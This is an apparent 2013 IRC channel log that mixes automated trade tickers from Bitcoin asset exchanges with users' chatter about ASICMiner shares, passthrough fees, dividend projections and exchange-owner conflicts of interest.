mtgox websocket api sends quote updates that are impossible May 23 17:50:36 jurov: thank you - so sounds like I can type the execute command and be done with it? May 23 17:50:37 ericmuyser: exactly May 23 17:50:38 that tag is not properly closed ericmuyser May 23 17:51:01 darn. May 23 17:51:08 cole_albon yes, you'll receive equivalend BTC value to your acct immediately May 23 17:51:16 [MPEX] [S.MPOE] 1900 @ 0.00070454 = 1.3386 BTC [+] May 23 17:51:18 [MPEX] [S.MPOE] 13700 @ 0.00070472 = 9.6547 BTC [+] May 23 17:53:02 [HAVELOCK] [ASICM] 2 @ 0.0248 = 0.0496 BTC [+] May 23 17:53:15 [BTCTC] [ASICMINER-PT] 1 @ 2.435 BTC [+] May 23 17:53:39 [BTCTC] [ASICMINER-PT] 1 @ 2.1 BTC [-] May 23 17:53:40 [BTCTC] [TAT.ASICMINER] 6 @ 0.024798 = 0.1488 BTC [+] May 23 17:53:40 i got in before dividends, 0.02! great success!! wait.. wahts this.. i lost 0.2.. so i broke even. oh well May 23 17:54:02 [HAVELOCK] [ASICM] 29 @ 0.0248 = 0.7192 BTC [+] May 23 17:54:21 what's wrong with this picture? May 23 17:54:22 Quantity=0.515988950 DeltaQuantity=0.515988950 Time=2013-05-23 09:40:08.870589-04:00 May 23 17:54:25 Quantity=0.494406280 DeltaQuantity=-0.021582670 Time=2013-05-23 09:40:14.354592-04:00 May 23 17:54:25 Speaking of skyrocketing, 100TH is 16 BTC from having lowest ask at .29. May 23 17:54:28 Quantity=0.294406280 DeltaQuantity=-0.200000000 Time=2013-05-23 09:40:17.650628-04:00 May 23 17:54:31 Quantity=0.000000000 DeltaQuantity=-0.494406280 Time=2013-05-23 09:40:17.698781-04:00 May 23 17:54:38 [MPEX] [S.MPOE] 5900 @ 0.00070472 = 4.1578 BTC [+] May 23 17:55:17 [BTCTC] [TAT.ASICMINER] 7 @ 0.0243 = 0.1701 BTC [-] May 23 17:55:23 [BTCTC] [TAT.ASICMINER] 4 @ 0.0242 = 0.0968 BTC [-] May 23 17:55:27 [BTCTC] [TAT.ASICMINER] 19 @ 0.024798 = 0.4712 BTC [+] May 23 17:55:53 [BTCTC] [COGNITIVE] 1 @ 0.251 BTC [+] May 23 17:55:55 After that, it's ฿60 away from 0.375. May 23 17:56:36 BTCUSD ticker | Best bid: 125.98001, Best ask: 126.00000, Bid-ask spread: 0.01999, Last trade: 126.00000, 24 hour volume: 22529.70862246, 24 hour low: 122.20000, 24 hour high: 126.92200, 24 hour vwap: 124.42247 May 23 17:57:13 [BTCTC] [BITVPS] 200 @ 0.00065 = 0.13 BTC [+] May 23 17:58:11 [BTCTC] [TAT.ASICMINER] 25 @ 0.024799 = 0.62 BTC [+] May 23 17:59:44 *crickets* Everyone running over to Pico? May 23 18:00:35 yep May 23 18:00:59 but 100TH is a fixed bond right? May 23 18:01:04 the ask side on 100th is ridiculous May 23 18:01:05 like it never gets more hashes? May 23 18:01:11 [BTCTC] [ASICMINER-PT] 3 @ 2.43 = 7.29 BTC [+] May 23 18:01:15 absolute zero faith in the company May 23 18:01:40 So far, yes. But wasn't AM also that in the early beginning before the IPO? Chaang? May 23 18:01:45 [BTCTC] [TAT.ASICMINER] 1 @ 0.024798 BTC [-] May 23 18:01:57 furuknap: 100th is 3 months post-IPO May 23 18:02:30 And they're also one share short of 600% up from IPO. May 23 18:04:33 [BTCTC] [GSDPT] 2 @ 0.00278 = 0.0056 BTC [+] May 23 18:05:07 [BTCTC] [ASICMINER-PT] 1 @ 2.4001 BTC [-] May 23 18:07:53 [BTCTC] [GSDPT] 1 @ 0.00278 BTC [+] May 23 18:10:03 [HAVELOCK] [ASICM] 3 @ 0.02498 = 0.0749 BTC [+] May 23 18:10:10 Besides, I doubt investors would be seriously pissed off if they changed the model to align more with AM model. May 23 18:10:29 why would they choose to lose money May 23 18:10:30 [BTCTC] [ASICMINER-PT] 2 @ 2.42 = 4.84 BTC [+] May 23 18:10:47 youre gonna be stuck with your fixed hasrate May 23 18:11:01 while AM shares represent a % of the network instead May 23 18:11:05 [BTCTC] [ASICMINER-PT] 1 @ 2.42 BTC [+] May 23 18:11:05 fixed hash rate bonds are a guarnteed loss May 23 18:11:07 That depends. If they hold shares in the company, the rise in share prices would be profitable and they wouldn't have to worry about floating a new asset. May 23 18:11:08 for owners May 23 18:11:29 [BTCTC] [BITVPS] 109 @ 0.00065 = 0.0709 BTC [+] May 23 18:11:53 do these shares give you any % of hardware sales? May 23 18:12:39 [BTCTC] [TAT.ASICMINER] 4 @ 0.0245 = 0.098 BTC [-] May 23 18:12:40 No, but that's the change that might be useful. If they intend to float a new hardware asset, that would require a lot of overhead and time to build confidence, which isn't easy for hardware startups. May 23 18:12:57 lol May 23 18:13:00 keep dreaming May 23 18:13:22 See how much trouble the swedes have. May 23 18:13:46 ? May 23 18:14:48 [BTCTC] [BASIC-MINING] 32 @ 0.56 = 17.92 BTC [+] May 23 18:14:49 KXsomethingMiner. They're the first company to talk about a 28nm chip and they're working with a highly reputable chip company to achieve that. May 23 18:14:56 [BTCTC] [TAT.ASICMINER] 2 @ 0.02448 = 0.049 BTC [-] May 23 18:15:06 [BTCTC] [TAT.ASICMINER] 8 @ 0.0242 = 0.1936 BTC [-] May 23 18:15:07 [BTCTC] [TAT.ASICMINER] 2 @ 0.0242 = 0.0484 BTC [-] May 23 18:15:11 Even then, people scream SCAM with their outdoors cvoice. May 23 18:15:51 who? May 23 18:15:55 what company I mean May 23 18:15:57 I live in Scandinavia, I know the culture, and running a scam like that wouldn't be even close to feasible. May 23 18:15:58 [BTCTC] [TAT.ASICMINER] 1 @ 0.024 BTC [-] May 23 18:16:25 this is bitcoin May 23 18:16:29 scams are the way May 23 18:16:33 plus May 23 18:16:39 [BTCTC] [TAT.ASICMINER] 2 @ 0.02448 = 0.049 BTC [+] May 23 18:16:40 no one said 100TH was a scam May 23 18:16:45 just a bad investment May 23 18:16:55 long-term at least May 23 18:17:00 So is AM. May 23 18:17:05 feel free to ride the hype machine May 23 18:17:09 and sell at top May 23 18:17:10 every bitcoin investment and exchange is a SCAM at some point. May 23 18:17:28 'The other' ASIC hardware company. Popped up a few weeks ago. KXCminer or something along those lines. May 23 18:17:35 They don't all start that way, but they all end that way. May 23 18:17:36 truth May 23 18:17:38 KncMiner. May 23 18:17:52 http://www.kncminer.com/ May 23 18:19:23 [BTCTC] [TAT.ASICMINER] 9 @ 0.02447 = 0.2202 BTC [-] May 23 18:19:33 [BTCTC] [BASIC-MINING] 1 @ 0.57 BTC [+] May 23 18:20:03 [HAVELOCK] [ASICM] 5 @ 0.0241 = 0.1205 BTC [-] May 23 18:20:08 I think that friedcat's long term actions have earned him a bit more respect and trust than your average mining asset May 23 18:20:20 AM has demonstrated repeatedly May 23 18:20:38 Sure, and that demonstration is already priced into the share. May 23 18:20:48 ok May 23 18:20:55 so sit back and collect divs? May 23 18:21:02 [HAVELOCK] [ASICM] 5 @ 0.024 = 0.12 BTC [-] May 23 18:21:07 and maybe even watch AM grow further May 23 18:21:12 [BTCTC] [ASICMINER-PT] 1 @ 2.401 BTC [-] May 23 18:21:14 [BTCTC] [ASICMINER-PT] 1 @ 2.40009 BTC [-] May 23 18:21:16 [BTCTC] [ASICMINER-PT] 8 @ 2.4 = 19.2 BTC [-] May 23 18:21:28 AM cannot grow much further in terms of revenue and dividends at these price points do not add up when you take halving effect into account. May 23 18:21:49 lol May 23 18:21:57 there you go with 3-year factors May 23 18:22:08 also May 23 18:22:16 AM can sell a LOT more hardware May 23 18:22:18 Of course, because the halving effect every week takes away 0.05 of dividends at ฿2. May 23 18:22:54 They'd need to sell 300 blades and 10K USB miners _every month for three years_ to make up what people think they're getting with that ludicrous 50% yield idea. May 23 18:23:54 what do you think the avg div will be May 23 18:23:55 Even at half that, and let's guess that every competitor fails for the next three years, in three years, AM revenue must go down because hw sales won't be as profitable and block reward goes down. May 23 18:24:00 thru April 2014 May 23 18:24:17 Hang on, firing up VM with model. May 23 18:24:27 no one is going to let 3 years from now factor into current price May 23 18:24:34 its just not on the radar May 23 18:24:41 for anyone except maybe AM themselves May 23 18:24:42 No, but that's because the herd doesn't realize it. May 23 18:24:43 [BTCTC] [ASICMINER-PT] 7 @ 2.4 = 16.8 BTC [-] May 23 18:25:09 [BTCTC] [ASICMINER-PT] 1 @ 2.41001 BTC [+] May 23 18:25:10 most people in bitcoin now, will have cashed out entirely in 3 years May 23 18:25:17 all speculators May 23 18:25:18 If you buy and hold now, in three years, your share value drops to 50%, costing you ฿1.25 if you buy at ฿2.5. May 23 18:25:52 We should do a public debate on this. :-D May 23 18:25:57 we are May 23 18:26:07 C'mon, you know what I'm talking about. May 23 18:26:07 [BTCTC] [TAT.ASICMINER] 2 @ 0.023902 = 0.0478 BTC [-] May 23 18:26:08 [BTCTC] [BASIC-MINING] 30 @ 0.57 = 17.1 BTC [+] May 23 18:26:15 hehe May 23 18:26:18 [BTCTC] [ASICMINER-PT] 2 @ 2.39 = 4.78 BTC [-] May 23 18:26:19 [BTCTC] [ASICMINER-PT] 1 @ 2.3501 BTC [-] May 23 18:26:20 [BTCTC] [ASICMINER-PT] 1 @ 2.35 BTC [-] May 23 18:26:22 [BTCTC] [ASICMINER-PT] 2 @ 2.35 = 4.7 BTC [-] May 23 18:26:23 i'm okay with revealing May 23 18:26:24 [BTCTC] [ASICMINER-PT] 1 @ 2.343 BTC [-] May 23 18:26:25 [BTCTC] [ASICMINER-PT] 5 @ 2.342 = 11.71 BTC [-] May 23 18:26:26 [BTCTC] [ASICMINER-PT] 4 @ 2.341 = 9.364 BTC [-] May 23 18:26:33 Whoops. May 23 18:26:58 Someone must have been listening in. May 23 18:27:06 lol May 23 18:27:09 [BTCTC] [TAT.ASICMINER] 1 @ 0.0239 BTC [-] May 23 18:27:13 [BTCTC] [TAT.ASICMINER] 1 @ 0.0239 BTC [-] May 23 18:27:15 [BTCTC] [TAT.ASICMINER] 9 @ 0.0239 = 0.2151 BTC [-] May 23 18:27:58 [BTCTC] [TAT.ASICMINER] 16 @ 0.023821 = 0.3811 BTC [-] May 23 18:28:05 [BTCTC] [TAT.ASICMINER] 44 @ 0.02382 = 1.0481 BTC [-] May 23 18:28:42 [BTCTC] [TAT.ASICMINER] 3 @ 0.02381 = 0.0714 BTC [-] May 23 18:28:44 [BTCTC] [TAT.ASICMINER] 5 @ 0.02381 = 0.1191 BTC [-] May 23 18:29:19 [BTCTC] [TAT.ASICMINER] 40 @ 0.0238 = 0.952 BTC [-] May 23 18:29:45 [BTCTC] [ASICMINER-PT] 1 @ 2.35 BTC [+] May 23 18:29:51 come to papa May 23 18:29:56 [BTCTC] [TAT.ASICMINER] 13 @ 0.02376 = 0.3089 BTC [-] May 23 18:30:14 [BTCTC] [TAT.ASICMINER] 26 @ 0.02375 = 0.6175 BTC [-] May 23 18:30:21 [BTCTC] [ASICMINER-PT] 1 @ 2.35 BTC [+] May 23 18:30:24 [BTCTC] [TAT.ASICMINER] 65 @ 0.02375 = 1.5438 BTC [-] May 23 18:31:10 [BTCTC] [TAT.ASICMINER] 6 @ 0.023701 = 0.1422 BTC [-] May 23 18:31:12 [BTCTC] [TAT.ASICMINER] 40 @ 0.023676 = 0.947 BTC [-] May 23 18:31:13 [BTCTC] [TAT.ASICMINER] 49 @ 0.023675 = 1.1601 BTC [-] May 23 18:31:15 [BTCTC] [TAT.ASICMINER] 30 @ 0.023667 = 0.71 BTC [-] May 23 18:31:16 [BTCTC] [TAT.ASICMINER] 26 @ 0.023667 = 0.6153 BTC [-] May 23 18:31:53 [BTCTC] [TAT.ASICMINER] 3 @ 0.02366 = 0.071 BTC [-] May 23 18:31:56 [BTCTC] [TAT.ASICMINER] 1 @ 0.023479 BTC [-] May 23 18:31:58 [BTCTC] [TAT.ASICMINER] 8 @ 0.0234 = 0.1872 BTC [-] May 23 18:32:00 [BTCTC] [TAT.ASICMINER] 5 @ 0.02311 = 0.1156 BTC [-] May 23 18:32:08 [BTCTC] [TAT.ASICMINER] 10 @ 0.023 = 0.23 BTC [-] May 23 18:32:11 [BTCTC] [TAT.ASICMINER] 3 @ 0.023 = 0.069 BTC [-] May 23 18:32:20 [BTCTC] [TAT.ASICMINER] 10 @ 0.023 = 0.23 BTC [-] May 23 18:33:11 Ouch... May 23 18:33:21 [BTCTC] [TAT.ASICMINER] 1 @ 0.02293 BTC [-] May 23 18:33:23 [BTCTC] [TAT.ASICMINER] 20 @ 0.02258 = 0.4516 BTC [-] May 23 18:33:35 ;;bids 0 May 23 18:33:43 There are currently 14043730 bitcoins demanded at or over 0.0 USD, worth 19669987.6621 USD in total. | Data vintage: 0.0630 seconds May 23 18:34:26 aww they stopped right at my bid May 23 18:34:28 how cruel May 23 18:35:19 [BTCTC] [ASICMINER-PT] 1 @ 2.344 BTC [-] May 23 18:35:30 lol May 23 18:35:37 [BTCTC] [TAT.ASICMINER] 2 @ 0.02381 = 0.0476 BTC [+] May 23 18:35:48 [BTCTC] [ASICMINER-PT] 2 @ 2.343 = 4.686 BTC [-] May 23 18:35:53 [BTCTC] [TAT.ASICMINER] 2 @ 0.02265 = 0.0453 BTC [-] May 23 18:35:55 [BTCTC] [TAT.ASICMINER] 44 @ 0.0226 = 0.9944 BTC [-] May 23 18:35:56 [BTCTC] [TAT.ASICMINER] 1411 @ 0.02258 = 31.8604 BTC [-] May 23 18:36:01 there it is! May 23 18:36:18 Wait for it... May 23 18:36:31 asicminer soon ITS REAL VALUE that is about 1 btc May 23 18:37:09 [BTCTC] [ASICMINER-PT] 1 @ 2.342 BTC [-] May 23 18:37:38 Hi May 23 18:40:02 [HAVELOCK] [ASICM] 32 @ 0.024999 = 0.8 BTC [+] May 23 18:40:17 Haha :-) May 23 18:40:30 Or he's stopped taking them. May 23 18:40:35 [BTCTC] [ASICMINER-PT] 2 @ 2.34 = 4.68 BTC [-] May 23 18:41:31 But your misspelling was epic. One for bash.org. May 23 18:42:34 [BTCTC] [ASICMINER-PT] 6 @ 2.34 = 14.04 BTC [-] May 23 18:44:03 [HAVELOCK] [VTX] 1 @ 0.4219 BTC [+] May 23 18:44:15 And there 100TH reahed 0.29. May 23 18:44:43 [BTCTC] [ASICMINER-PT] 1 @ 2.335 BTC [-] May 23 18:45:39 [BTCTC] [ASICMINER-PT] 1 @ 2.314 BTC [-] May 23 18:45:51 [BTCTC] [BTC-BOND] 597 @ 0.010096 = 6.0273 BTC [+] May 23 18:45:53 [BTCTC] [BTC-BOND] 1 @ 0.010096 BTC [+] May 23 18:45:57 [BTCTC] [BTC-BOND] 100 @ 0.010097 = 1.0097 BTC [+] May 23 18:45:59 [BTCTC] [BTC-BOND] 117 @ 0.010098 = 1.1815 BTC [+] May 23 18:46:02 [HAVELOCK] [ASICM] 250 @ 0.0241 = 6.025 BTC [-] May 23 18:46:04 [HAVELOCK] [ASICM] 392 @ 0.0241 = 9.4472 BTC [-] May 23 18:46:05 [HAVELOCK] [ASICM] 628 @ 0.024 = 15.072 BTC [-] May 23 18:46:06 [BTCTC] [BTC-BOND] 5 @ 0.0101 = 0.0505 BTC [+] May 23 18:46:40 [BTCTC] [TAT.ASICMINER] 2 @ 0.022701 = 0.0454 BTC [+] May 23 18:46:41 [BTCTC] [TAT.ASICMINER] 23 @ 0.0227 = 0.5221 BTC [-] May 23 18:46:42 [BTCTC] [ASICMINER-PT] 1 @ 2.369 BTC [+] May 23 18:47:02 [HAVELOCK] [ASICM] 11 @ 0.02499 = 0.2749 BTC [+] May 23 18:47:04 [HAVELOCK] [ASICM] 167 @ 0.024 = 4.008 BTC [-] May 23 18:47:05 [HAVELOCK] [ASICM] 222 @ 0.024 = 5.328 BTC [-] May 23 18:47:29 [BTCTC] [ASICMINER-PT] 1 @ 2.368999 BTC [-] May 23 18:48:03 [BTCTC] [ASICMINER-PT] 1 @ 2.368999 BTC [-] May 23 18:48:22 [BTCTC] [ASICMINER-PT] 2 @ 2.368999 = 4.738 BTC [-] May 23 18:48:25 ;;ticker May 23 18:48:25 BTCUSD ticker | Best bid: 126.00000, Best ask: 126.20999, Bid-ask spread: 0.20999, Last trade: 126.00000, 24 hour volume: 22389.83248438, 24 hour low: 122.20000, 24 hour high: 126.93446, 24 hour vwap: 124.62009 May 23 18:48:29 :-) May 23 18:48:37 [BTCTC] [TAT.ASICMINER] 1 @ 0.023697 BTC [+] May 23 18:49:01 [BTCTC] [ASICMINER-PT] 1 @ 2.368999 BTC [-] May 23 18:49:45 [BTCTC] [BASIC-MINING] 19 @ 0.57 = 10.83 BTC [+] May 23 18:49:46 [BTCTC] [BASIC-MINING] 31 @ 0.58 = 17.98 BTC [+] May 23 18:50:04 [BTCTC] [ASICMINER-PT] 1 @ 2.36999 BTC [+] May 23 18:50:06 [BTCTC] [ASICMINER-PT] 9 @ 2.39 = 21.51 BTC [+] May 23 18:50:07 [BTCTC] [ASICMINER-PT] 2 @ 2.398 = 4.796 BTC [+] May 23 18:50:08 [BTCTC] [ASICMINER-PT] 1 @ 2.3989 BTC [+] May 23 18:50:09 [BTCTC] [ASICMINER-PT] 25 @ 2.4 = 60 BTC [+] May 23 18:50:11 [BTCTC] [ASICMINER-PT] 1 @ 2.4377 BTC [+] May 23 18:50:12 [BTCTC] [ASICMINER-PT] 1 @ 2.43775 BTC [+] May 23 18:50:13 nice May 23 18:50:14 [BTCTC] [ASICMINER-PT] 1 @ 2.438 BTC [+] May 23 18:50:15 [BTCTC] [ASICMINER-PT] 2 @ 2.44 = 4.88 BTC [+] May 23 18:50:16 Huh? May 23 18:50:17 [BTCTC] [ASICMINER-PT] 1 @ 2.44 BTC [+] May 23 18:50:18 [BTCTC] [ASICMINER-PT] 1 @ 2.445 BTC [+] May 23 18:50:20 [BTCTC] [ASICMINER-PT] 2 @ 2.4499 = 4.8998 BTC [+] May 23 18:50:22 [BTCTC] [ASICMINER-PT] 1 @ 2.449995 BTC [+] May 23 18:50:25 lol May 23 18:50:26 [BTCTC] [ASICMINER-PT] 6 @ 2.449995 = 14.7 BTC [+] May 23 18:50:29 Impressive. May 23 18:50:32 [BTCTC] [ASICMINER-PT] 31 @ 2.449995 = 75.9498 BTC [+] May 23 18:50:34 [BTCTC] [ASICMINER-PT] 497 @ 2.45 = 1217.65 BTC [+] May 23 18:50:38 ! May 23 18:50:42 Geez! May 23 18:50:42 [BTCTC] [ASICMINER-PT] 19 @ 2.45 = 46.55 BTC [+] May 23 18:50:50 Guess DT is a happy camper now. May 23 18:50:54 holy shitnuggets May 23 18:51:01 yep May 23 18:51:08 SAelkl 100TH, BUY AM;!!! May 23 18:51:08 Dayum May 23 18:51:09 worked out great for both of us May 23 18:51:13 i must thank him May 23 18:51:17 he pushed price down May 23 18:51:20 i bought a ton May 23 18:51:28 then someone rallied and bought him out May 23 18:51:31 very nice May 23 18:51:48 [BTCTC] [TAT.ASICMINER] 10 @ 0.0227 = 0.227 BTC [-] May 23 18:52:00 [BTCTC] [ASICMINER-PT] 1 @ 2.315 BTC [-] May 23 18:52:26 burnside: ping May 23 18:52:30 [BTCTC] [ASICMINER-PT] 3 @ 2.35 = 7.05 BTC [+] May 23 18:52:36 good time to sell then lol, ThickAsThieves May 23 18:52:37 burnside: PM me when you get some time. May 23 18:52:59 [BTCTC] [ASICMINER-PT] 1 @ 2.37 BTC [+] May 23 18:53:07 instant profit for the next dump: there will be more to come! May 23 18:53:29 [BTCTC] [TAT.ASICMINER] 2 @ 0.02369 = 0.0474 BTC [+] May 23 18:53:30 not yet eric, May 23 18:53:42 there is still 2000 for sale on forums at 2.5 May 23 18:53:46 Hello. May 23 18:53:51 [BTCTC] [TAT.ASICMINER] 1 @ 0.023696 BTC [+] May 23 18:54:02 Thick, ASICMINER shares ? May 23 18:54:06 yes May 23 18:54:15 [BTCTC] [TAT.ASICMINER] 19 @ 0.023697 = 0.4502 BTC [+] May 23 18:54:34 Thick, Your PT is cheaper. :P May 23 18:54:44 [BTCTC] [TAT.ASICMINER] 5 @ 0.02369 = 0.1185 BTC [-] May 23 18:54:45 <@assbot> [BTCTC] [TAT.ASICMINER] 2 @ 0.02369 = 0.0474 BTC [+] May 23 18:55:16 ThickAsThieves: so? cheaper to pick up the PT and request a transfer if you want direct? May 23 18:55:34 Thick does not do transfer. May 23 18:55:37 [BTCTC] [ASICMINER-PT] 1 @ 2.1 BTC [-] May 23 18:55:53 no xfers May 23 18:56:14 Friedcat has enough work to do without a million requests from me May 23 18:56:33 [BTCTC] [TAT.ASICMINER] 7 @ 0.023697 = 0.1659 BTC [+] May 23 18:56:34 yeah really May 23 18:56:46 [BTCTC] [TAT.ASICMINER] 1 @ 0.023696 BTC [-] May 23 18:56:48 sorry which 2000? where May 23 18:56:49 Think, IIRC there is 2 ASICminer passthroughs, One does not take a management fee, And your do. May 23 18:56:55 thought you meant non TAT May 23 18:57:06 May I ask why are you charging 5% to manage the shares ? May 23 18:57:12 [BTCTC] [TAT.ASICMINER] 5 @ 0.023698 = 0.1185 BTC [+] May 23 18:57:16 because i dont work for free May 23 18:57:23 [MPEX] [S.MPOE] 17500 @ 0.00070442 = 12.3274 BTC [-] May 23 18:57:31 three May 23 18:57:32 theres three May 23 18:57:33 Because passthrough managers typically charge a fee May 23 18:57:34 [BTCTC] [BASIC-MINING] 19 @ 0.58 = 11.02 BTC [+] May 23 18:57:41 the other PT is operated by the BTC TC owner, so he has good reason not to charge if people are trading on his site and he's getting fees May 23 18:57:47 two straight throughs, and then tat May 23 18:57:47 Namworld, ASICMINER-PT is free. May 23 18:57:59 BTC0xygen: operated by the site owner May 23 18:58:00 And the bitfunder PT. May 23 18:58:03 Yes, what ericmuyser said May 23 18:58:09 Owner gets trading fees May 23 18:58:37 So it's at his advantage to encourage people to get his PT shares instead of the others by charging no fees on dividends May 23 18:58:43 [BTCTC] [BASIC-MINING] 21 @ 0.59 = 12.39 BTC [+] May 23 18:58:48 Bitfunder ASICMINER-PT is not owned by the site owner. and does not charge a fee. May 23 18:59:03 [HAVELOCK] [ASICM] 33 @ 0.024001 = 0.792 BTC [+] May 23 18:59:10 yes but he has some sort of arrangement with the owner May 23 18:59:13 that is unknown May 23 18:59:27 nothing is free May 23 18:59:28 hmm May 23 18:59:40 Air is free. :P May 23 18:59:41 BTC0xygen: I dont get it you want people to WORK for FREE? doesn't that scare you? May 23 19:00:00 ^^^^^^^ May 23 19:00:03 [HAVELOCK] [ASICM] 3 @ 0.024 = 0.072 BTC [-] May 23 19:00:08 Think should be working to get the free blade. :P May 23 19:00:16 what free blade May 23 19:00:17 Thick* May 23 19:00:24 they dont exist May 23 19:00:34 that blade is more likely to cost me money May 23 19:00:37 than be a benefit May 23 19:00:48 because if i dont get a board seat before he send them May 23 19:00:51 i have to buy one May 23 19:00:53 to compete May 23 19:01:02 [HAVELOCK] [ASICM] 33 @ 0.02391 = 0.789 BTC [-] May 23 19:01:11 If your PT owns more than 5k shares you become a board member and get a free blade. May 23 19:02:02 [HAVELOCK] [ASICM] 158 @ 0.0239 = 3.7762 BTC [-] May 23 19:02:18 he can choose the color ? May 23 19:02:33 TAT, How many shares does your PT own? May 23 19:02:39 [BTCTC] [TAT.ASICMINER] 11 @ 0.024698 = 0.2717 BTC [+] May 23 19:02:41 error4733: What color? May 23 19:02:51 my bad May 23 19:03:01 :P May 23 19:03:02 [HAVELOCK] [ASICM] 150 @ 0.02360005 = 3.54 BTC [-] May 23 19:03:03 almost 2000 May 23 19:03:03 confuse with the usb miner May 23 19:03:04 5% on divs is such an insignificant amount *per person* it's laughable. it's kickstarter May 23 19:03:21 correct, eric May 23 19:03:22 lol May 23 19:03:41 give a few minutes to show a funny example May 23 19:03:46 of how small 5% of divs is May 23 19:03:46 [BTCTC] [ASICMINER-PT] 1 @ 2.478 BTC [+] May 23 19:03:47 kk May 23 19:03:47 [BTCTC] [ASICMINER-PT] 3 @ 2.478 = 7.434 BTC [+] May 23 19:04:08 [HAVELOCK] [ASICM] 400 @ 0.02360001 = 9.44 BTC [-] May 23 19:05:02 [HAVELOCK] [ASICM] 100 @ 0.02340001 = 2.34 BTC [-] May 23 19:05:18 speaking of kickstarter May 23 19:05:24 I wonder if I could kickstarter a 1EB storage pool. May 23 19:06:02 [HAVELOCK] [ASICM] 73 @ 0.023341 = 1.7039 BTC [-] May 23 19:06:32 Diablo-D3: 1EB ? May 23 19:06:41 1000PB = 1EB May 23 19:06:45 1000TB = 1PB May 23 19:06:54 ah. May 23 19:07:00 Not bitcoin related. May 23 19:07:03 [HAVELOCK] [ASICM] 7 @ 0.02319819 = 0.1624 BTC [-] May 23 19:07:59 Let's say I have 5000 shares worth 2.5btc each. Assuming AM will pay .025 in divs EVERY week, I would get 0.00125 per share, or about 27btc per month. May 23 19:08:02 [HAVELOCK] [ASICM] 3 @ 0.023166 = 0.0695 BTC [-] May 23 19:08:06 At current BTC/USD value that means that I would be getting paid $3500/mo to be liable for assets worth $1,575,000. May 23 19:08:55 And thats for 5%, right? May 23 19:09:02 [HAVELOCK] [ASICM] 120 @ 0.02312 = 2.7744 BTC [-] May 23 19:09:12 right May 23 19:09:19 now May 23 19:09:27 [BTCTC] [ASICMINER-PT] 1 @ 2.479 BTC [+] May 23 19:09:34 do you want a man holding $1.5m in assets May 23 19:09:37 to work for free? May 23 19:09:55 3500 x 12 = 42,000 = 2.66% of portfolio value yearly. May 23 19:09:59 The other PT holds 5m in assets and work for free. :P May 23 19:10:01 [BTCTC] [ASICMINER-PT] 1 @ 2.481224 BTC [+] May 23 19:10:03 [HAVELOCK] [ASICM] 23 @ 0.0231 = 0.5313 BTC [-] May 23 19:10:11 i assure you he does not May 23 19:10:17 [BTCTC] [ASICMINER-PT] 1 @ 2.49 BTC [+] May 23 19:10:18 He could have a agreement with the site operator. May 23 19:10:42 let me show you one more example May 23 19:10:48 as to why Burnside does it for free May 23 19:10:55 what's his trade fee? May 23 19:11:02 like .5%? May 23 19:11:07 [HAVELOCK] [ASICM] 90 @ 0.023001 = 2.0701 BTC [-] May 23 19:11:07 0.2% May 23 19:11:07 0.4% May 23 19:11:14 he charges both sides May 23 19:11:17 Yeah, but 0.2 from both sides May 23 19:11:20 [BTCTC] [TAT.ASICMINER] 33 @ 0.024698 = 0.815 BTC [+] May 23 19:11:20 k May 23 19:11:33 better than 5%. :P May 23 19:11:47 0.4% x 1200 BTC trade earlier = 4.8 BTC May 23 19:11:50 [BTCTC] [TAT.ASICMINER] 8 @ 0.024699 = 0.1976 BTC [+] May 23 19:11:52 Burnside has made 518.72 coins this week May 23 19:11:53 in fees May 23 19:11:57 Yeah, and better than 100%. He still reaps from every sale. May 23 19:12:01 [HAVELOCK] [ASICM] 1100 @ 0.023 = 25.3 BTC [-] May 23 19:12:10 or $65,358.72 May 23 19:12:17 in one week! May 23 19:12:21 off AM alone May 23 19:12:32 wish I was that clever May 23 19:12:51 12968.8 Volume x 0.4% = 51.872 BTC this week. May 23 19:12:54 ThickAsThieves: lol. May 23 19:13:00 Now things start to make sense. May 23 19:13:02 You're one order of magnitude too high May 23 19:13:06 [BTCTC] [TAT.ASICMINER] 36 @ 0.024699 = 0.8892 BTC [+] May 23 19:13:11 am i? May 23 19:13:17 yeah May 23 19:13:18 hmm May 23 19:13:29 Still, 6500$ per week May 23 19:13:36 ThickAsThieves: He made 51 coins. May 23 19:13:38 12968btc vol May 23 19:13:50 for the week May 23 19:14:00 [BTCTC] [ASICMINER-PT] 19 @ 2.4899 = 47.3081 BTC [-] May 23 19:14:05 oh yeah May 23 19:14:06 Aye May 23 19:14:08 yer right May 23 19:14:11 sorry! May 23 19:14:20 [BTCTC] [TAT.ASICMINER] 3 @ 0.0247 = 0.0741 BTC [+] May 23 19:14:22 $6500 per week May 23 19:14:22 [BTCTC] [TAT.ASICMINER] 22 @ 0.0247 = 0.5434 BTC [+] May 23 19:14:28 ;;calc 47.3081 * 0.004 May 23 19:14:29 0.1892324 May 23 19:14:36 . May 23 19:14:37 . May 23 19:14:37 . May 23 19:14:39 0.18 BTC for the last PT trade May 23 19:14:46 18 bucks May 23 19:14:46 either way May 23 19:14:56 you can see why burnside does it for 'free' May 23 19:14:56 and it keeps coming in all day like this May 23 19:15:06 yeah. May 23 19:15:11 [MPEX] [S.MPOE] 17000 @ 0.00070442 = 11.9751 BTC [-] May 23 19:15:35 [BTCTC] [TAT.ASICMINER] 15 @ 0.024799 = 0.372 BTC [+] May 23 19:15:36 problem is May 23 19:15:42 there is a bit of conflict of interest May 23 19:15:52 having the PT operator be the exchange owner May 23 19:15:58 I trust Burnsy n all May 23 19:16:21 but it's a little shakey for him to be running his own PT imo May 23 19:16:45 this is probably why Ukto didnt do his own May 23 19:16:53 and worked something out with DT May 23 19:17:13 [BTCTC] [TAT.ASICMINER] 38 @ 0.02485 = 0.9443 BTC [+] May 23 19:17:15 [BTCTC] [TAT.ASICMINER] 5 @ 0.024997 = 0.125 BTC [+] May 23 19:17:26 [BTCTC] [TAT.ASICMINER] 10 @ 0.024999 = 0.25 BTC [+] May 23 19:17:28 [BTCTC] [ASICMINER-PT] 1 @ 2.4899 BTC [-] May 23 19:18:00 man, i feel like i'm totally the tinfoil-hatter in this channel now May 23 19:18:06 lol May 23 19:18:19 dt wall moved? May 23 19:18:28 or eated? May 23 19:18:29 no it got ate May 23 19:18:32 sheeeeeet May 23 19:18:41 you missed the fireworks May 23 19:18:47 how much is 1,000,000 mBTC in btc again? May 23 19:18:53 [BTCTC] [TAT.ASICMINER] 32 @ 0.024999 = 0.8 BTC [+] May 23 19:18:54 [BTCTC] [COGNITIVE] 11 @ 0.252511 = 2.7776 BTC [+] May 23 19:18:56 [BTCTC] [ASICMINER-PT] 2 @ 2.4899 = 4.9798 BTC [-] May 23 19:18:59 [BTCTC] [COGNITIVE] 1 @ 0.2595 BTC [+] May 23 19:19:00 [BTCTC] 